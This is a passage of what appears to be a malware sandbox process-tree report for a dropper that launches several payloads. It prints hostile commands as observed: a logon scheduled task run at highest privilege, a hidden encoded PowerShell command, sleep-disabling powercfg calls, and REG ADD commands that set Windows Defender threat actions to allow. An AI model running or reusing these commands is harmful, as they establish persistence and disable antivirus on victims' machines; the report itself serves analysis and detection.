        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_c2304190946cb37f941f9c4acb289e9f\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_c2304190946cb37f941f9c4acb289e9f LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5256
    - - C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\FlJqSiuL8X7ZyLEod2f6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\FlJqSiuL8X7ZyLEod2f6.exe"
        5⤵
        Executes dropped EXE
        
        PID:2280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
        6⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:3376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc142046f8,0x7ffc14204708,0x7ffc14204718
        7⤵
        
        PID:1404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
        7⤵
        
        PID:5976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
        7⤵
        
        PID:720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
        7⤵
        
        PID:4340
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
        7⤵
        
        PID:5084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
        7⤵
        
        PID:2880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
        7⤵
        
        PID:3168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
        7⤵
        
        PID:2216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
        7⤵
        
        PID:2372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
        7⤵
        
        PID:3212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
        7⤵
        
        PID:5972
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
        7⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
        7⤵
        
        PID:3964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
        7⤵
        
        PID:4568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
        7⤵
        
        PID:4996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3296 /prefetch:2
        7⤵
        
        PID:1880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1780 /prefetch:1
        7⤵
        
        PID:4560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
        7⤵
        
        PID:6076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
        7⤵
        
        PID:844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,3361024545466595973,1463078651376251933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
        7⤵
        
        PID:4352
    - - C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\fqaEFn20tPKtGTDCoMLJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\heidi1C47b7qGlZLd\fqaEFn20tPKtGTDCoMLJ.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4884
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1988
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1220
        7⤵
        Program crash
        
        PID:544
  - - C:\Users\Admin\Documents\GuardFox\Cm83ixjY2n3PECS3wKVi7ZuT.exe
      "C:\Users\Admin\Documents\GuardFox\Cm83ixjY2n3PECS3wKVi7ZuT.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:2712
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2840
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2772
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5352
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2468
  - - C:\Users\Admin\Documents\GuardFox\HYcK04fDpm59NE1iuqeohCe6.exe
      "C:\Users\Admin\Documents\GuardFox\HYcK04fDpm59NE1iuqeohCe6.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5128
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Blocklisted process makes network request
        
        PID:1304
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 2196
        6⤵
        Program crash
        
        PID:1628
  - - C:\Users\Admin\Documents\GuardFox\zSq9_LNldKYh1CBz04gNfS_1.exe
      "C:\Users\Admin\Documents\GuardFox\zSq9_LNldKYh1CBz04gNfS_1.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      PID:3972
  - - C:\Users\Admin\Documents\GuardFox\zWVaRgE_VfJUi5dB8iqZVzds.exe
      "C:\Users\Admin\Documents\GuardFox\zWVaRgE_VfJUi5dB8iqZVzds.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5592
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Modifies system certificate store
        
        PID:1628

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5672 -ip 5672
1⤵
PID:5140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5672 -ip 5672
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5672 -ip 5672
1⤵
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5672 -ip 5672
1⤵
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5672 -ip 5672
1⤵
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5672 -ip 5672
1⤵
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5672 -ip 5672
1⤵
PID:5336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5932
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5672 -ip 5672
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5384 -ip 5384
1⤵
PID:1128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5672 -ip 5672
1⤵
PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1304 -ip 1304
1⤵
PID:5128

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5672
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4700
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:5336
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:5396
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:2420
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4200
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5324 -ip 5324
1⤵
PID:560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3112 -ip 3112
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5704 -ip 5704
1⤵
PID:4296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4296

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc22989758,0x7ffc22989768,0x7ffc22989778
  2⤵
  PID:5960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:2
  2⤵
  PID:5632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:8
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2028 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:8
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3176 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:1
  2⤵
  PID:4256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4084 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:1
  2⤵
  PID:5992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:8
  2⤵
  PID:5636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:8
  2⤵
  PID:1596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 --field-trial-handle=1872,i,12963030142295064379,4357081448042140184,131072 /prefetch:8
  2⤵
  PID:5856

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn\VHPhyMJGvokurjb\foUkoPZ.exe
C:\Users\Admin\AppData\Local\Temp\YfEflelvsosyxfuRn\VHPhyMJGvokurjb\foUkoPZ.exe ze /apsite_idZsr 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:340
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:644
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:3288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
